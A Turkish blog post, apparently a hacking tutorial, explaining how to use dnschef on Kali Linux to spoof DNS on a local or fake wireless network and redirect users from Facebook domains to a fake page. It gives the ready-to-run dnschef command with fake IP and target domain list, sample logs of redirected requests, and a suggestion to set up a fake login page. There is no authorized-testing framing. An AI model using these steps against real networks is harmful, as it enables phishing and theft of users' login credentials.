Dnschef ile kullanıcıları sahte sayfaya yönlendirmek.

dnschef


 

 

 

Dnschef nedir:
Kali Linux üzerinde bulunan Transparan proxy gibi görev yapan kısaca transparan(şeffaf) dns olarak adlandırabiliriz.
iç ağda bulunan kullancıların 8.8.8.8 (yada herhangi bir dns adresi yerine) (isim çözmesini dns isteklerini) size yönlendirir yine sizin aracılığınızla internete çıkmasını sağlar. sizde bu sayade tüm istekleri görebilir herhangi bir  ip adresine yönlendirebilirsiniz.
burada atlanılmaması gereken yer kullanıcıların dns adresi sizin ip adresiniz olmalı. ben burada bu örneği sahte kablosuz ağ üzerinden gerçekleştirdim. “sahte kablosuz ağ nasıl yapabilirim derseniz’de ilgili yazı çok yakında” konumuza geri dönelim.

Örneğin facebook.com yerine

facebook.com=192.168.101.20 "iç ağınızda bulunan sahte facebook sayfası"

Kali Linux üzerinden şu komutu çalıştırıp yardım alalım.

dnschef -h

Aşağıdaki komutu uygulayalım. buradaki komutların anlamı şöyle -fakeip yönlendirmek istediğimiz sayfamızın ip adresi -fakedomains hangi adreslerin sahte sayfaya yönlendireleceği alan. -interface dnschef çalışacağı arabirim ip adresi.

dnschef --fakeip=192.168.101.21 --fakedomains=portal.fb.com,tr-tr.facebook.com,www.facebook.com,ws.frappsy.com  --interface=192.168.101.21

Çalışmaya başladığında aşağıdaki gibi dns isteklerini görebilirsiniz.

[19:49:17] 192.168.101.65: proxying the response of type 'A' for download.windowsupdate.com
[19:49:19] 192.168.101.65: proxying the response of type 'A' for www.update.microsoft.com
[19:49:36] 192.168.101.64: cooking the response of type 'A' for ws.frappsy.com to 192.168.101.21
[19:50:36] 192.168.101.64: cooking the response of type 'A' for ws.frappsy.com to 192.168.101.21

Proxying gelen isteğin herhangi bir yönlendirmeye uğramadan devam ettiğini belirtiyor.
Cooking gelen istediğin 192.168.101.21 adresine yönlendirildiğini görüyoruz.siz burada ilgili ip adresine yine kali araçlarını kullanarak sahte bir giriş sayfası yapabilirsiniz.

Etiketler: , , , , ,

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*